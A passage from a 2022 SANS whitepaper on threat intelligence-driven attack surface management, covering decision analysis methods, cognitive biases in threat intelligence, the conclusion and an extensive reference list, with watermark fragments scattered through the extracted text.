2016, Ch. 7). Also, while information gathering is necessary for CTI, a suitable value
te
may be placed using DA on even imperfect information to avoid wasteful information
itu

gathering and ensure that the information’s significance is not relevant and material and
st

higher than its cost. (Howard & Abbas, 2016, ch.13).

In

Distinctions made in CTI should help reach decision clarity; many observable
NS

differences are not particularly useful because they supply no benefit. (Howard & Abbas,
SA

2016, pp. 84-85). Possibility trees standing for multiple distinctions—from one degree to
compound possibilities —may help drive clarity. (Howard & Abbas, 2016, p. 87).
e
Th

CTI deals with measures of belief or probabilities that depend on the state of
22

information. Therefore, probability trees may help graphically support a division of

20

certainty through many distinctions, each having multiple degrees. The assessment may
sometimes change by knowing that certain degrees of other distinctions have occurred.
©

(Howard & Abbas, 2016, Ch. 6). Sensitivity analysis may help decide whether more
investigation is necessary and may be used to clarify how the assessment would change if
certain predicates changed in the decision basis. (Howard & Abbas, 2016, ch.12).
CTI often relies on multiple sources of information, requiring an assessment of
the relevance relations between them because joint information can be higher than, less
than, or equal to the sum of data value from individual sources. (Howard & Abbas, 2016,
p. 397). DA relevance diagrams and probability trees may help in this regard as well.
(Howard & Abbas, 2016, ch.18).

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 18

gh
Ri
The methodology of generating CTI assessments, much like DA, requires careful
attention to cognition, which is the process that turns perceptions into beliefs. (cf.

ll
Fu
Howard & Abbas, 2016, p. 351). Based on cognitive psychology, for instance, one cause
of cognitive biases causing opinions to reflect perceptions improperly is wishful

ns
thinking—forming beliefs based on what should be, rather than on evidence and letting a

ai
et
particular worldview affect our thinking process. (Howard & Abbas, 2016, p. 351).

rR
Another is the misuse of the availability heuristic, which claims that the easier it is to
think of an event, the more likely it is to happen, such as using more current information

ho
to blow events out of proportion. (Howard & Abbas, 2016, p. 351). Another thinking

ut
error is estimating probabilities based on often incorrect similarity judgments that

,A
misinterpret the effect of uncertainty rather than first separating prior information from
te
new evidence and then processing the data using probability theory. (Howard & Abbas,
itu

2016, p. 352). Another cognitive bias relevant to CTI from DA is forming beliefs
st

prematurely, letting our first ideas play too large a role in deciding our final assessments.
In

(cf. Howard & Abbas, 2016, p. 353).

NS

Like DA, CTI must consider the tendency of implicitly conditioning probability
SA

on the occurrence of uncertain events. (cf. Howard & Abbas, 2016, p. 354). Also, like
e

DA, CTI must safeguard against the hidden effects of subconscious motivation, such as
Th

when self-interest influences beliefs. (cf. Howard & Abbas, 2016, p. 355). Motivational
22

biases can also occur within CTI teams, such as differing incentive structures tending to
20

influence assessments unless scrutinized for biases affecting thought processes.

(cf. Howard & Abbas, 2016, p. 785).
©

“While there is no definitive index, over 200 cognitive biases have been
identified in psychology, sociology, and management research.” (Mohanani et al., 2020,
sec. 1). Cognitive biases are essential to be aware of as they can affect CTI quality and
CTI-ASM.

7. Conclusion
This commentary offers a conceptual framework of CTI-ASM to improve cyber
resiliency. In addition, this commentary hopefully will encourage researchers to explore
CTI-ASM further, thus serving as a basis for future research.

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 19

gh
Ri
Empirical research is needed to study CTI-ASM in its real-world contexts by
collaborating with defenders applying CTI-ASM in day-to-day work.

ll
Fu
Future research may include a systematic literature review (Siddaway et al., 2019)
of DA case studies that apply relevance diagrams, examine corporate risk attitudes, weigh

ns
imperfect information, use possibility and probability trees or sensitivity analysis, or

ai
et
address cognitive and motivational biases. Based on the review, research may experiment

rR
to test the hypothesis that bridging a gap between DA and CTI-ASM would improve the
quality of CTI-ASM and CTI.

ho
ut
,A
te
itu
st
In
NS
SA
e
Th
22
20
©

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 20

gh
Ri
Acknowledgements

ll
Fu
Thanks to all my Microsoft colleagues for valuable feedback and to Mark Seiden and Jonathan Spring,
who helped me improve this commentary’s quality. Views expressed do not necessarily reflect the

ns
opinions of Microsoft or any contributor.

ai
References

et
rR
Ahmed, D. (2022, July 21). Critical vulnerability in popular GPS tracker lets hackers

ho
remotely control vehicles. HACKREAD. Retrieved from

ut
https://www.hackread.com/vulnerability-gps-tracker-hackers-remotely-control-
vehicles/
,A
te
Badhwar, R. (2021). Dynamic measurement of cyber risk. In The CISO’s next frontier.
itu

doi.org/10.1007/978-3-030-75354-2_40
st

Barrett, M. (2018), Framework for Improving Critical Infrastructure Cybersecurity

In

Version 1.1, NIST Cybersecurity Framework,

NS

doi.org/10.6028/NIST.CSWP.04162018
SA

Beek, C. (2020). VirusTotal poisoning. perma.cc/NT4Q-UHQD

Bong, C. W., Holtby, D. W., & Ng, K. S. (2012). Fuzzy Multicriteria Decision Analysis
e
Th

for Measurement of Document Content Reliability. 2012 Fifth Int’l Symposium on

Computational Intelligence and Design. doi.org/10.1109/iscid.2012.227
22

Brown, R., & Lee, R. M. (2019). The evolution of cyber threat intelligence (CTI): 2019
20

Sans CTI survey. Sans Institute. perma.cc/BA3A-ZVSS

©

Center for Internet Security Intel & Analysis Working Group [Security Intel]. (n.d.).
What is cyber threat intelligence? [Blog post]. perma.cc/5P7X-GSBW
Center for Internet Security [CIS]. (2021, January 12) [2021a]. Automated cyber threat
intelligence pilot reduced states' response times to minutes [Blog post].
perma.cc/7JQ3-NVBE
Central Intelligence Agency [CIA]. (n.d.). United States. Central Intelligence Agency -
CIA. cia.gov/the-world-factbook/countries/united-states/#people-and-society Last
updated 15 June 2022

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 21

gh
Ri
CIS. (2021, June 15) [2021a]. Cybersecurity spotlight - Cyber threat indicator sharing
[Blog post]. perma.cc/9T34-DVFK

ll
Fu
CIS. (2021, June 25) [2021b]. A new vision for cyber threat intelligence at the MS-ISAC
[Blog post]. perma.cc/C3HN-S7CS

ns
CIS. (2021, November 19) [2021c]. Real-time indicator feeds [Blog post].

ai
et
perma.cc/Q2RD-NG7J

rR
The Center for Threat-Informed Defense [CTID] (2021, May 3) [2021a]. ATT&CK for
containers.perma.cc/RKM7-UUCZ

ho
CTID. (2021, October 14) [2021b]. ATT&CK workbench. perma.cc/ZN7H-3BQ8

ut
CTID. (2021, October 28) [2021c]. Mapping ATT&CK to CVE for impact.
perma.cc/EN4V-XU9A
,A
te
CTID. (2022, March 2). Attack flow. perma.cc/VF3Y-EB4H
itu

Cybersecurity and Infrastructure Security Agency [CISA]. (n.d.). Apache Log4j

st

vulnerability guidance. perma.cc/3637-MSGB

In

Collier, Z. A., DiMase, D., Walters, S., Tehranipoor, M.M., Lambert, J. H., & Linkov, I.
NS

(2014). Cybersecurity standards: Managing risk and creating resilience. Computer,

SA

47(9), 70-76. doi.org/10.1109/mc.2013.448

e

Committee of Sponsoring Organizations of the Treadway Commission (COSO). (2017).

Th

Enterprise Risk Management Integrating with Strategy Performance.

22

perma.cc/F4TV-P7BX
20

Davis Advisors, D. S. (2009). On success. Marceline, MO: Walsworth publishing

company.
©

Dehghantanha, A., Conti, M., & Dargahi, T. (2019). Cyber threat intelligence. Springer.
Diogenes, Y., & Shinder, T. (2018). Microsoft Azure security center. Microsoft Press.
Diamond, T., Kerman, A., Souppaya, M., Stine, K., Johnson, B., Peloquin, C., Ruffin, V.,
Simon, M., Sweeney, S., Scarfone, K. (2022) Improving enterprise patching for
general IT systems: Utilizing existing tools and performing processing in better ways.
NIST, NIST Special Publ. 1800-31. doi.org/10.6028/NIST.SP.1800-31
Doerr, E. (2021, July 12). Microsoft to acquire RiskIQ to strengthen cybersecurity of
digital transformation and hybrid work [Blog post]. perma.cc/Q4LN-ZA3Z

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 22

gh
Ri
Doherty, D., & McKenney, B. (2021). Zero trust architectures: are we there yet? (21-
1273). MITRE. perma.cc/FB27-7Q96

ll
Fu
Dwivedi, A (2018) Implementing cyber resilient designs through graph analytics assisted
model-based systems engineering. 2018. IEEE Int’l Conference on Software Quality,

ns
Reliability and Security Companion (QRS-C). doi.org/10.1109/qrs-c.2018.00106

ai
et
Elitzur, A., Puzis, R., & Zilberman, P. (2019). Attack hypothesis generation. 2019

rR
European Intelligence and Security Informatics Conference (EISIC). doi:
10.1109/EISIC49498.2019.9108886.

ho
Estrin, E. (2022). Cloud security handbook. Packt Publishing.

ut
Gartner Enterprise Risk Management Research Team [Gartner]. (2021, March 29)

,A
[2021a]. 2021 ERM risk response accelerator for cyber risks — topic guide: ERM’s
te
role and frameworks (ID No. G00743265 -). [GARTNER is a registered trademark
itu

and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally
st

and is used herein with permission. All rights reserved.] perma.cc/5HJV-ZZ3M

In

Gartner. (2021, March 29) [2021b]. 2021 ERM Risk Response Accelerator for Cyber
NS

Risks — Topic Guide: Controls, Threats, and Consequences (ID No. G00748842)
SA

perma.cc/Y85L-LRB4
e

Ginty, S. (2022, April 20). Discover the anatomy of an external cyberattack surface with
Th

new RiskIQ report. perma.cc/UH2F-9T4X

22

Godyla, N., & Nickels, K. (2021, June 22). Strategies, tools, and frameworks for building
20

an effective threat intelligence team [Blog post]. perma.cc/MH5Q-MC6V

Gourisetti, S. N., Mylrea, M., & Patangia, H. (2020). Cybersecurity vulnerability
©

mitigation framework through empirical paradigm (CyFEr): Prioritized gap analysis.

IEEE Systems Journal, 14(2), 1897-1908. doi.org/10.1109/jsyst.2019.2913141
Gylling, A., Ekstedt, M., Afzal, Z., & Eliasson, P. (2021). Mapping cyber threat
intelligence to probabilistic attack graphs. 2021 IEEE International Conference on
Cyber Security and Resilience (CSR). doi:10.1109/csr51186.2021.9527970
Hallum, C. (2021, December 6). Protect printers, cameras, and the rest of your IoT
devices starting today! [Microsoft blog post] perma.cc/QZ4E-T7LY
Hamilton, E. (2021, July 20). What are cyber-physical attacks? The Science Times.
perma.cc/3LT7-WK7E

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 23

gh
Ri
Harvard Business Review [HBR]. (2021, July 19). Pulse survey | Cybersecurity in the
era of intelligence and an expanding attack surface. Analytic Services.

ll
Fu
perma.cc/HRC3-XRVK
Harvard Law School Forum on Corporate Governance [Harvard]. (2022, April 11).

ns
Proposed SEC cyber rules: A game changer for public companies. perma.cc/BXF6-

ai
et
6V7G

rR
Heuer, R. J. (2019). Psychology of intelligence analysis. Pickle Partners Publishing.
Hong, Z., Li, S., & Yu, L. (2020). Accelerating update of approximations under a

ho
dominance relation. IEEE Access, 8, 146472-

ut
146482. doi.org/10.1109/access.2020.3015813

,A
Howard, R. A., & Abbas, A. E. (2016). Foundations of decision analysis global edition.
te
Harlow, England: Pearson Education Limited.
itu

Howard, R. A., & Matheson, J. E. (1989). Readings on the principles and applications of
st

decision analysis vol. I. Sdg Decision Systems.

In

Hutchins, E.M.; Cloppert, M.J.; Amin, R.M. (2011) Intelligence-driven computer

NS

network defense informed by analysis of adversary campaigns and intrusion kill

SA

chains. Lead. Issues Inf. Warf. Secur. Res. 2011, 1, 80. perma.cc/DN4K-XQLE
e

IDC. (2022, April 27) [2022a]. Global cybersecurity market implications of the Russia-
Th

Ukraine war webinar. perma.cc/U7AB-YLFK

22

IDC. (2022, May 12) [2022b]. Worldwide digital transformation investments forecast to
20

reach $1.8 trillion in 2022, according to new IDC spending guide. perma.cc/UCQ3-
KF4J
©

International Organization for Standardization [ISO]. (2020) Security and resilience —

business continuity management systems — guidance on the use of ISO 22301 (ISO
international standard no. 22313:2020(E). perma.cc/CT7K-BKN6
Jakkal, V. (2022, May 9). Building a safer world together with our partners—introducing
Microsoft security experts. perma.cc/3AYC-BZVT
Joint Task Force (2018). Risk management framework for information systems and
organizations (NIST), NIST Special Publ. 800-37, Rev. 2.
doi.org/10.6028/NIST.SP.800-37r2

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 24

gh
Ri
Kazmi, S. A., & Naarananoja, M. (2014). Significance of management system for
effective organizational management. GSTF International Journal on Business

ll
Fu
Review (GBR), 3(2). doi.org/10.7603/s40706-013-0022-2
Kriaa, S., & Chaabane, Y. (2021). SecKG: Leveraging attack detection and prediction

ns
using knowledge graphs. 2021 12th International Conference on Information and

ai
et
Communication Systems (ICICS). doi: 10.1109/ICICS52457.2021.9464587

rR
Kumar, S. (2022, March 3). Cybercrime: A clear and present danger. Security Magazine.
perma.cc/6T7S-UCSS

ho
Lee, R. M., & Brown, R. (2021). 2021 SANS Cyber Threat Intelligence (CTI) Survey.

ut
perma.cc/SU9Z-BR44

,A
Lin, H., Burnett, D., Sheaffer, D.A., & Arnold, E. (2009). Applying decision analysis
te
process to exterior physical security system technology design and selection. 43rd
itu

Annual 2009 International Carnahan Conference on Security Technology, 312-316.

st

doi: 10.1109/CCST.2009.5335519
In

Mavroeidis, V., Hohimer, R., Casey, T., & Jesang, A. (2021). Threat actor type inference
NS

and characterization within cyber threat intelligence. 2021 13th International

SA

Conference on Cyber Conflict (CyCon). doi: 10.23919/CyCon51939.2021.9468305.

e

McAfee Enterprise [McAfee], & FireEye. (2021, November 9). Cyber threats have
Th

increased 81% since global pandemic. perma.cc/7L8W-KXX7

22

McMillan, R., Poulsen, K., & Volz, D. (2022, March 28). Secret world of pro-Russia
20

hacking group exposed in leak. Wall Street Journal [WSJ] perma.cc/S7WP-PJ9T

Microsoft Corp. [Microsoft] (2019). Why use Jupyter for security investigations? —
©

msticpy 1.7.5 documentation. perma.cc/Q467-DDTS

Microsoft (2020, September 22). Microsoft delivers unified SIEM and XDR to
modernize security operations. Microsoft Security Blog. perma.cc/V6A5-JDKG
Microsoft (2021, April 1) [2021a]. Automating threat actor tracking: Understanding
attacker behavior for intelligence and contextual alerting. Microsoft Security
Blog. perma.cc/3W4Z-6M3R
Microsoft (2021, August 13) [2021b]. Attackers use Morse code, other encryption
methods in evasive phishing campaign. Microsoft Security Blog. perma.cc/A6EB-
TH25

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 25

gh
Microsoft (2021, October) [2021c]. Microsoft digital defense report – Microsoft security.

Ri
perma.cc/AY24-ZQ73

ll
Fu
Microsoft (2021, November 18) [2021d]. Connect your threat intelligence platform to
Microsoft Sentinel. perma.cc/8MM7-DU9R

ns
Microsoft (2021, November 19) [2021e]. External attack surface management: Intelligent

ai
et
defense in the age of digital transformation. perma.cc/UA9H-4VYA

rR
Microsoft. (2021, December 11) [2021f]. Guidance for preventing, detecting, and hunting
for exploitation of the Log4j 2 vulnerability. perma.cc/JY7A-8WYQ

ho
Microsoft (2022, January 11) [2022a]. Inside Microsoft 365 defender: Mapping attack

ut
chains from cloud to endpoint. Microsoft Security Blog. perma.cc/55B5-UXXD

,A
Microsoft (2022, March 7) [2022c]. Kusto query language (KQL) overview- Azure data
te
explorer | Microsoft docs. perma.cc/3VVG-ZFN6
itu

Microsoft (2022, April 19) [2022f]. The mobile attack surface goes beyond major mobile
st

app stores. Security Insider. perma.cc/PH89-ZND8

In

Microsoft (2022, April 19) [2022g]. Anatomy of an external attack surface: Threat actors
NS

don’t have to compromise assets to attack an organization or its customers.

SA

perma.cc/GSE5-MZGR
e

Microsoft (2022, May 9) [2022d]. Ransomware-as-a-service: Understanding the

Th

cybercrime gig economy and how to protect yourself. Microsoft Security Blog.
22

perma.cc/EBW7-U9SK
20

Microsoft (2022, May 11) [2022h]. Failure Modes in Machine Learning - Security
documentation | Microsoft Doc. perma.cc/AX6S-A8HZ
©

Microsoft (2022, May 17) [2022i]. Understand and use attack surface reduction (ASR).
Developer tools, technical documentation, and coding examples | Microsoft Docs.
perma.cc/D9DH-T55Z
Microsoft (2022, June 14) [2022e]. Threat intelligence integration in Microsoft Sentinel.
Developer tools, technical documentation, and coding examples | Microsoft Docs.
perma.cc/2S6G-L7LS
Microsoft Threat Intelligence Center [MSTIC]. (2021, April 27). MSTICPy v1.0.0 and
Jupyter notebooks in Azure Sentinel, an update. perma.cc/9ANN-QL3T

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 26

gh
Ri
Ming Li, Weijia Jia and Wei Zhao, "Decision analysis of network-based intrusion
detection systems for denial-of-service attacks," 2001 International Conferences on

ll
Fu
Info-Tech and Info-Net. Proceedings (Cat. No.01EX479), 2001, pp. 1-6 vol.5,
doi.org/10.1109/ICII.2001.983485.

ns
The MITRE Corp. [MITRE] (2021, June 22). CVE- cve-2021-35244. perma.cc/LGF4-

ai
et
2CKH

rR
MITRE (2022, February 10). After SolarWinds, tamper proofing the cyber ecosystem.
perma.cc/HNX5-7TY8

ho
MITRE (n.d.). MITRE ATLAS™ (adversarial threat landscape for artificial-intelligence

ut
systems) case studies. perma.cc/JX5S-LGEF

,A
MITRE (n.d.). MITRE ATT&CK®. perma.cc/GWW8-NTCC
te
R. Mohanani, I. Salman, B. Turhan, P. Rodríguez and P. Ralph, "Cognitive Biases in
itu

Software Engineering: A Systematic Mapping Study," in IEEE Transactions on

st

Software Engineering, vol. 46, no. 12, pp. 1318-1339, 1 Dec. 2020, doi:
In

10.1109/TSE.2018.2877759
NS

National Institute of Standards and Technology [NIST] (2011a). Managing information

SA

security risk organization, mission, and information system view (U.S. Dept. of
e

Commerce, Wa., D.C.), NIST Special Publ. 800-39. doi.org/10.6028/NIST.SP.800-39

Th

NIST (2012b). Guide for Conducting Risk Assessments, NIST Special Publ. 800-30.
22

NIST (2016c). Cyber supply chain risk management. perma.cc/W8LD-R7Q7

20

NIST (2021d). Operational technology security. NIST Computer Security Resource

Center | CSRC. perma.cc/T9CB-5AFE
©

NIST. (n.d.). Attack surface - Glossary | CSRC. NIST Computer Security Resource
Center | CSRC. perma.cc/92GL-KU27
Parkinson, S., Crampton, A., & Hill, R. (2018). Guide to vulnerability analysis for
computer networks and systems: An artificial intelligence approach [Springer
Computer Communications and Networks series (CCN)]. doi.org/10.1007/978-3-319-
92624-7
PCI Pal. (2019, Sept. 17) [Press Release]. New global research shows poor data security
practices have serious consequences for businesses worldwide. perma.cc/YL3K-
96BN

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 27

gh
Ri
Pete Shoard and Shilpi Handa. (2021). Hype Cycle for Security Operations, 2021 (ID No.
G00747546). perma.cc/6XBU-LPEF

ll
Fu
Rose, S., Borchert, O., Mitchell, S., Connelly, S. (2020). Zero Trust Architecture, NIST,
NIST Special Publ. 800-207. doi.org/10.6028/NIST.SP.800-207

ns
Roy, S., Sharmin, N., Acosta, J. C., Kiekintveld, C., & Laszka, A. (2022). Survey and

ai
et
taxonomy of adversarial reconnaissance techniques. ACM Computing Surveys.

rR
doi.org/10.1145/3538704
Sargent, J. (2022, February 16). Security perimeter is no more as attack surface continues

ho
to expand. SD Times. perma.cc/2PSY-8K4F

ut
Schaberreiter, T., Kupfersberger, V., Rantos, K., Spyros, A., Papanikolaou, A., Ilioudis,

,A
C., & Quirchmayr, G. (2019). A quantitative evaluation of trust in the quality of cyber
te
threat intelligence sources. Proceedings of the 14th International Conference on
itu

Availability, Reliability and Security. doi/10.1145/3339252.3342112

st

Schlette, D., Caselli, M., & Pernul, G. (2021). A comparative study on cyber threat
In

intelligence: The security incident response perspective. IEEE Communications

NS

Surveys & Tutorials, 23(4), 2525-2556. doi.org/10.1109/COMST.2021

SA

Shankar, R., Kumar, S., & Johnson, A. (2020, October 22). Cyberattacks against machine
e

learning systems are more common than you think [Blog post]. perma.cc/PQW3-
Th

CADE
22

Shreeve, B., Hallett, J., Edwards, M., Anthonysamy, P., Frey, S., & Rashid, A. (2021).
“So if Mr blue head here clicks the link...” risk thinking in cyber security decision
20

making. ACM Transactions on Privacy and Security, 24(1), 1-

©

29. doi.org/10.1145/3419101
Siddaway AP, Wood AM, Hedges LV. How to do a systematic review: a best practice
guide for conducting and reporting narrative reviews, meta-analyses, and meta-
syntheses. Annu Rev Psychol 2019 Dec 4;70:747-770 doi.org/10.1146/annurev-
psych-010418-102803
Silver, G. (2021, April 26). Managing cybersecurity risk: four options for CEOs, CFOs,
and risk officers. Forbes Technology Council. perma.cc/V2CF-ZXUK

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 28

gh
Ri
Souppaya, M., Karen, S. (2022). Guide to enterprise patch management planning:
preventive maintenance for technology. (NIST), NIST Special Publ. 800-40, Rev. 4.

ll
Fu
doi.org/10.6028/NIST.SP.800-40r4
Stine, K.M., Quinn, S.D., Ivy, N., Feldman, L., Witte, G.A., & Gardner, R. (2020)

ns
Identifying and Estimating Cybersecurity Risk for Enterprise Risk Management

ai
et
(ERM). (NIST), NISTIR 8286. doi.org/10.6028/NIST.IR.8286

rR
Stine, K.M., Quinn, S.D., Ivy, N., Barrett, M., Feldman, L., Witte, G.A., & Gardner, R.
(2021) Identifying and Estimating Cybersecurity Risk for Enterprise Risk

ho
Management (ERM). (NIST), NISTIR 8286A. doi.org/10.6028/NIST.IR.8286A

ut
Smith, G. S. (2022). The new normal in IT: How the global pandemic changed

,A
information technology forever. Wiley.
te
Spring, J., Hatleback, E., Householder, A., Manion, A., & Shick, D. (2021). Time to
itu

change the CVSS? IEEE Security & Privacy, 19(2), 74-78.

st

doi:10.1109/MSEC.2020.3044475.
In

Spring, J. M. (2022). An analysis of how many undiscovered vulnerabilities remain in

NS

information systems. perma.cc/X8HF-3A83

SA

The Open Group. (2021). Zero trust commandments (“Open Group”). perma.cc/M2UQ-
e

AZG5
Th

Wang, Y., Zhou, N. Z., Zhang, N., Liu, D., Xing, R., Luan, T. H., & Shen, X. (2022,
22

April 8). A survey on Metaverse: Fundamentals, security, and privacy.

20

doi.org/10.48550/arXiv.2203.02662
The White House. (2021, October 1). Statement by President Joe Biden on cybersecurity
©

awareness month. perma.cc/77NB-S4YW

Wilburn, D., & Schmidt, C. (2022, March 15). Log4shell and endemic vulnerabilities in
open-source libraries. perma.cc/M7BL-Q7GY
Yale, N., & Zonghao, Y. (2021, January 18). Backdoor attack on deep learning models in
mobile apps. perma.cc/X27Q-62CZ
Yeboah-Ofori, Abel et al. “Cyber Threat Predictive Analytics for Improving Cyber
Supply Chain Security.” IEEE Access 9 (2021): 94318-94337.
doi.org:10.1109/ACCESS.2021.3087109

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.
 ts
Threat Intelligence-Driven Attack Surface Management 29

gh
Ri
Yin, Z., Xu, Y., Ma, F., Gao, H., Qiao, L., & Jiang, Y. (2022). Scanner++: Enhanced
vulnerability detection of web applications with attack intent synchronization. ACM

ll
Fu
Transactions on Software Engineering and Methodology. doi.org/10.1145/3517036
Zbakh, M., Elmahdi, K., Cherkaoui, R., & Enniari, S. (2015). A multi-criteria analysis of

ns
intrusion detection architectures in cloud environments. 2015 International

ai
et
Conference on Cloud Technologies and Applications (CloudTech).

rR
doi.org/10.1109/cloudtech.2015.7336967

ho
ut
,A
te
itu
st
In
NS
SA
e
Th
22
20
©

Jonathan Matkowsky, [email protected]

© 2022 The SANS Institute Author retains full rights.